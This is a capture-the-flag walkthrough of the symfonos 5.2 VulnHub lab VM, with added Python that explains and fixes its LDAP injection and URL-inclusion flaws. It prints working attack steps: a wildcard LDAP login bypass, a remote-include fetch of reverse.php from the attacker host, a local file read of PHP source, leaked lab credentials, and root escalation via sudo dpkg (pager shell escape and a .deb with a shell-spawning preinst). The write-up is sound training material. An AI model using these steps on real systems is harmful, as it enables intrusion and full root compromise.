
[攻略鸭] symfonos 5.2: VulnHub target walkthrough

Posted: 2023-02-26 01:15:13      Source: Bilibili

The content of this article is purely fictional. 攻略鸭 would appreciate follows and likes on Bilibili!



Target IP address: 192.168.31.197

Attacker IP address: 192.168.31.38

External reconnaissance

Browsing to http://192.168.31.197/ shows nothing but an image.

Port scan

PORT    STATE SERVICE  REASON         VERSION
22/tcp  open  ssh      syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp  open  http     syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
389/tcp open  ldap     syn-ack ttl 63 OpenLDAP 2.2.X - 2.3.X
636/tcp open  ldapssl? syn-ack ttl 63
LDAP Results
|   <ROOT>
|       namingContexts: dc=symfonos,dc=local
|       supportedControl: 2.16.840.1.113730.3.4.18
...
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: DIGEST-MD5
|       supportedSASLMechanisms: OTP
|       supportedSASLMechanisms: NTLM
|       supportedSASLMechanisms: CRAM-MD5
|_      subschemaSubentry: cn=Subschema

Note the TTL values: 64 on 22/tcp but 63 on 80, 389 and 636. The web and LDAP services answer from one hop behind the host, which fits containers on a bridge network (the Debian SSH banner next to an Ubuntu Apache banner points the same way); the LDAP address 172.18.0.22 recovered later from the admin.php source is consistent with that.

LDAP anonymous bind

$ ldapdomaindump 192.168.31.197

Fails: the anonymous bind yields nothing useful.

Web directory enumeration

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.197/FUZZ -e .php,.txt -c

.php                    [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 2ms]
home.php                [Status: 302, Size: 979, Words: 117, Lines: 29, Duration: 2ms]
admin.php               [Status: 200, Size: 1650, Words: 707, Lines: 40, Duration: 1ms]
static                  [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 0ms]
logout.php              [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 0ms]
portraits.php           [Status: 200, Size: 165, Words: 10, Lines: 4, Duration: 13ms]
server-status           [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 0ms]

http://192.168.31.197/admin.php is a login form.

Trying SQL injection

GET /admin.php?username=admin%27or%271&password=asfd

No effect.

Identified test points

(1) Sensitive information disclosure

GET /home.php

Response:

HTTP/1.1 302 Found

Although the status is a redirect, the response body still contains http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php, which reveals a url parameter that home.php fetches and the internal address the application uses for itself.

(2) LDAP injection

Since the host exposes an LDAP service, the login form is a natural candidate for LDAP injection.

GET /admin.php?username=*&password=*

The login succeeds. In an LDAP search filter * is a wildcard, so a filter assembled from these two values matches any entry that has both a uid and a userPassword attribute, regardless of the real credentials. The page after login is http://127.0.0.1/home.php?url=http://127.0.0.1/portraits.php; it uses the internal address, so rewrite the host to reach it from the attacker machine: http://192.168.31.197/home.php?url=http://127.0.0.1/portraits.php
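To make the bypass concrete, here is an added Python example (not code from the original walkthrough or from the target VM). It rebuilds the login filter in the shape admin.php uses, (&(uid=$username)(userPassword=$password)), which this writeup recovers from the page source further down, evaluates it against the zeus entry from the LDAP dump with a small toy matcher, and contrasts it with RFC 4515 escaping. The matcher understands only the and-of-equality shape that this filter has; it is not an LDAP server.

```python
import re

# Added example, not the target's code: why username=*&password=* logs in,
# and what RFC 4515 escaping changes. The filter shape is the one recovered
# from admin.php in this walkthrough; the entry is zeus from the LDAP dump.

# RFC 4515 section 3: these characters must be hex-escaped inside a filter value.
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def escape_filter_value(value: str) -> str:
    """Escape user input so it is matched literally, never read as filter syntax."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_filter_vulnerable(username: str, password: str) -> str:
    """Raw string interpolation, the way the target's admin.php builds it."""
    return f"(&(uid={username})(userPassword={password}))"


def build_filter_escaped(username: str, password: str) -> str:
    """Same filter with both values escaped: a user-supplied '*' becomes \\2a."""
    u, p = escape_filter_value(username), escape_filter_value(password)
    return f"(&(uid={u})(userPassword={p}))"


def _value_to_regex(value: str) -> str:
    """Assertion value -> regex: unescaped '*' is a wildcard, \\XX is a literal byte."""
    unescape = lambda s: re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    parts = [re.escape(unescape(p)) for p in value.split("*")]
    return "^" + ".*".join(parts) + "$"


def eval_and_filter(ldap_filter: str, entry: dict) -> bool:
    """Toy evaluation of a filter shaped (&(attr=value)(attr=value)...) against one entry."""
    m = re.fullmatch(r"\(&((?:\([^()]*\))+)\)", ldap_filter)
    if not m:
        raise ValueError("only (&(a=v)(b=v)...) filters are supported here")
    for attr, value in re.findall(r"\(([^=()]+)=([^()]*)\)", m.group(1)):
        if attr not in entry or not re.fullmatch(_value_to_regex(value), entry[attr]):
            return False
    return True


# Entry copied from the walkthrough's ldapsearch output (userPassword base64-decoded).
ZEUS = {"uid": "zeus", "userPassword": "cetkKf4wCuHC9FET"}


def login_attempts() -> dict:
    """Map a label to whether the filter matches zeus (True means 'logged in')."""
    return {
        "vuln_star_star": eval_and_filter(build_filter_vulnerable("*", "*"), ZEUS),
        "vuln_zeus_star": eval_and_filter(build_filter_vulnerable("zeus", "*"), ZEUS),
        # Wildcard prefix: the basis for extracting the password one character at a time.
        "vuln_zeus_c_star": eval_and_filter(build_filter_vulnerable("zeus", "c*"), ZEUS),
        "vuln_zeus_x_star": eval_and_filter(build_filter_vulnerable("zeus", "x*"), ZEUS),
        "escaped_star_star": eval_and_filter(build_filter_escaped("*", "*"), ZEUS),
        "escaped_real_creds": eval_and_filter(build_filter_escaped("zeus", "cetkKf4wCuHC9FET"), ZEUS),
    }


if __name__ == "__main__":
    for label, ok in login_attempts().items():
        print(f"{label:20s} -> {'login' if ok else 'denied'}")
```

The vuln_zeus_c_star case is the part worth remembering: once a wildcard reaches the filter, an attacker does not need the whole password, they can confirm it one character at a time. Escaping closes that, but the design is still wrong. Checking userPassword inside a search filter forces the application to bind with a privileged account (the hard-coded cn=admin credential seen later) and only works when the directory stores passwords in cleartext; the correct pattern is to search for the uid, then bind as the returned DN with the password the user typed and let the directory do the comparison.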

Testing for file inclusion

Trying RFI

http://192.168.31.197/home.php?url=http://192.168.31.38:8088/reverse.php

The remote file is fetched, but its PHP is not executed: the source comes back as plain text.

GET /home.php?url=http://127.0.0.1/admin.php

This returns the rendered page, with no PHP source, because the request goes through the local Apache, which executes the script before answering. It does confirm that home.php will fetch arbitrary internal URLs on the attacker's behalf.

Trying LFI

GET /home.php?url=admin.php

With no scheme at all, the value is treated as a local path and the response contains the PHP source of admin.php, including:

// LDAP server on the internal container network; admin bind credential hard-coded in the web app
$ldap_ch = ldap_connect("ldap://172.18.0.22");
$bind = ldap_bind($ldap_ch, "cn=admin,dc=symfonos,dc=local", "qMDdyZh3cT6eeAWD");
// $username and $password come straight from the request, with no escaping
$filter = "(&(uid=$username)(userPassword=$password))";
$result = ldap_search($ldap_ch, "dc=symfonos,dc=local", $filter);
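The three observations above (an http:// URL is fetched and echoed as text, http://127.0.0.1/... reaches the internal web server, and a scheme-less admin.php reads the local file, while other schemes are refused with "Wrong scheme! You can only use http or https!") fit a scheme check that only runs when a scheme is present. The Python below is an added reconstruction written for this edit, not the target's actual home.php: it shows a fail-open check with that behaviour, a closed version of the same check, and the allowlist-of-pages design that removes the URL parameter altogether. The allowed hostname, the page names and the web root are assumptions.

```python
import ipaddress
import os
from typing import Optional
from urllib.parse import urlsplit

# Added example, not home.php from the target: a fail-open scheme check with the
# behaviour observed in the walkthrough, next to two hardened alternatives.

ALLOWED_SCHEMES = ("http", "https")


def scheme_check_fails_open(url: str) -> bool:
    """Hypothetical vulnerable check. Any non-http(s) scheme is refused, but a value
    with no scheme at all (e.g. 'admin.php') is never examined, so a following
    file_get_contents()-style read opens it as a local path."""
    scheme = urlsplit(url).scheme
    if scheme and scheme not in ALLOWED_SCHEMES:
        return False  # "Wrong scheme! You can only use http or https!"
    return True


def _is_internal_host(host: str) -> bool:
    """True for literal loopback/private/link-local/reserved addresses and 'localhost'.
    A DNS name that resolves to such an address is not caught here; that needs a
    check at resolution time (not shown)."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        return host.lower() == "localhost"
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_reserved


def url_check_closed(url: str, allowed_hosts=("cdn.example.test",)) -> bool:
    """Hardened fetch check: scheme must be present and allowed, host must be present,
    must not be internal, and must be on an explicit allowlist (assumed hostname)."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    if _is_internal_host(parts.hostname):
        return False
    return parts.hostname.lower() in allowed_hosts


# Better still: do not accept a URL at all. Map a short page name to a fixed file.
PAGES = {"portraits": "portraits.php", "home": "home.php"}  # assumed page set


def resolve_page(name: str, webroot: str = "/var/www/html") -> Optional[str]:
    """Return the absolute path of an allowlisted page name, or None for anything else."""
    rel = PAGES.get(name)
    if rel is None:
        return None
    path = os.path.normpath(os.path.join(webroot, rel))
    # Belt and braces: the resolved path must still live under the web root.
    return path if path.startswith(webroot.rstrip("/") + "/") else None


if __name__ == "__main__":
    for u in ("http://127.0.0.1/admin.php", "admin.php", "file:///etc/passwd"):
        print(f"{u:30s} fail-open={scheme_check_fails_open(u)} closed={url_check_closed(u)}")
```

The fail-open variant reproduces both findings on this box: the SSRF to 127.0.0.1 and the local read of admin.php. The closed variant blocks them, but still hands the application a URL fetcher to defend; resolve_page is what the feature actually needs here, since home.php only ever displays its own pages.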

Accessing LDAP

With jxplorer

DN: cn=admin,dc=symfonos,dc=local

Password: qMDdyZh3cT6eeAWD

With ldapsearch

$ ldapsearch -x -H ldap://192.168.31.197 -D 'cn=admin,dc=symfonos,dc=local' -w qMDdyZh3cT6eeAWD -b 'dc=symfonos,dc=local'

# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User

After binding, jxplorer shows the same entries with the base64 (::) values decoded:

cn: admin
userPassword: {SSHA}UWYxvuhA0bWsjfr2bhtxQbapr9eSgKVm

cn: zeus
gecos: Zeus User
gidNumber: 14564100
homeDirectory: /home/zeus
loginShell: /bin/bash
mail: zeus@symfonos.local
objectClass: top, posixAccount, inetOrgPerson
sn: 3
uid: zeus
uidNumber: 14583102
userPassword: cetkKf4wCuHC9FET

The admin password is stored as an SSHA hash, but zeus's userPassword has no {scheme} prefix: OpenLDAP stores whatever value it is given, and this one was written in cleartext.
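ldapsearch base64-encodes any value that is not safe LDIF text and marks it with a double colon, which is why the raw dump and the jxplorer view look different. The following Python is an added example, not part of the original walkthrough: it parses the LDIF above (embedded as sample input copied from this writeup), decodes the :: values, and reports which userPassword values are hashed and which are cleartext. Spotting the cleartext one is what makes the SSH login below possible.

```python
import base64
from typing import Dict, List, Tuple

# Added example, not part of the original walkthrough. Sample input copied from
# the ldapsearch output above.
SAMPLE_LDIF = """\
# symfonos.local
dn: dc=symfonos,dc=local
objectClass: top
objectClass: dcObject
objectClass: organization
o: symfonos
dc: symfonos

# admin, symfonos.local
dn: cn=admin,dc=symfonos,dc=local
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
description: LDAP administrator
userPassword:: e1NTSEF9VVdZeHZ1aEEwYldzamZyMmJodHhRYmFwcjllU2dLVm0=

# zeus, symfonos.local
dn: uid=zeus,dc=symfonos,dc=local
uid: zeus
cn: zeus
sn: 3
objectClass: top
objectClass: posixAccount
objectClass: inetOrgPerson
loginShell: /bin/bash
homeDirectory: /home/zeus
uidNumber: 14583102
gidNumber: 14564100
userPassword:: Y2V0a0tmNHdDdUhDOUZFVA==
mail: zeus@symfonos.local
gecos: Zeus User
"""

Entry = Dict[str, List[str]]


def parse_ldif(text: str) -> List[Entry]:
    """Parse LDIF into a list of {attribute: [values]} dicts.
    Handles comments, folded lines (continuation starts with one space),
    multi-valued attributes, and base64 values marked 'attr:: ...'."""
    logical: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]  # unfold
        else:
            logical.append(raw)

    entries: List[Entry] = []
    current: Entry = {}
    for line in logical:
        if line.startswith("#") or line.startswith("version:"):
            continue
        if not line.strip():  # blank line ends an entry
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):  # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        elif value.startswith("<"):  # URL-valued ('attr:< file:///...'); keep the reference
            value = value[1:].strip()
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def classify_password(value: str) -> str:
    """OpenLDAP stores userPassword verbatim: only a '{SCHEME}' prefix such as
    {SSHA} or {CRYPT} marks a hash. Anything else is cleartext."""
    if value.startswith("{") and "}" in value:
        return "hashed:" + value[1:value.index("}")]
    return "cleartext"


def find_credentials(entries: List[Entry]) -> List[Tuple[str, str, str]]:
    """Return (dn, userPassword, classification) for every entry carrying a password."""
    found = []
    for entry in entries:
        for pw in entry.get("userPassword", []):
            found.append((entry["dn"][0], pw, classify_password(pw)))
    return found


if __name__ == "__main__":
    for dn, pw, kind in find_credentials(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn:40s} {kind:12s} {pw}")
```

Run against the dump above it prints one hashed credential (admin, SSHA) and one cleartext credential (zeus), which is the one to try against SSH.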

Trying the recovered username and password over SSH

ssh zeus@192.168.31.197
zeus@symfonos5:~$ id
uid=1000(zeus) gid=1000(zeus) groups=1000(zeus),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Privilege escalation via sudo

$ sudo -l
Matching Defaults entries for zeus on symfonos5:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User zeus may run the following commands on symfonos5:
    (root) NOPASSWD: /usr/bin/dpkg

Method 1

$ sudo dpkg -l
ii  cpio      2.12+dfsg-9          amd64     GNU cpio -- a program to manage archives of files
ii  cpp       4:8.3.0-1            amd64     GNU C preprocessor (cpp)
ii  cpp-8     8.3.0-6              amd64     GNU C preprocessor
ii  cron      3.0pl1-134+deb10u1   amd64     process scheduling daemon

dpkg -l sends the listing through a pager (less), which is now running as root. At the prompt at the bottom of the listing, type:

!/bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)

The ! prefix is the pager's shell escape; the same trick applies to any sudo rule for a command that invokes a pager.

Method 2

fpm needs rubygems and friends; on a Debian-based attacker box install it with:

sudo apt-get install ruby ruby-dev rubygems build-essential
sudo gem install --no-document fpm
fpm --version

Build a package whose pre-install script spawns a shell (fpm turns --before-install into the package's preinst maintainer script, which dpkg runs as root before unpacking):

echo 'exec /bin/sh' > exp.sh
fpm -n x -s dir -t deb -a all --before-install exp.sh .
ls -al
-rw-r--r--  1 kali kali 8341274 Feb 21 04:38 x_1.0_all.deb

Transfer it to the target and install it:

$ sudo dpkg -i x_1.0_all.deb
Selecting previously unselected package x.
(Reading database ... 53057 files and directories currently installed.)
Preparing to unpack x_1.0_all.deb ...
# id
uid=0(root) gid=0(root) groups=0(root)

Other

flag

# cat /root/proof.txt
Congrats on rooting symfonos:5!

Target VM issues

When I fuzzed the LDAP injection and the LFI they did not work, and the error "Wrong scheme! You can only use http or https!" looked so convincing that I assumed there was filtering. It only started working after I re-imported the virtual machine.
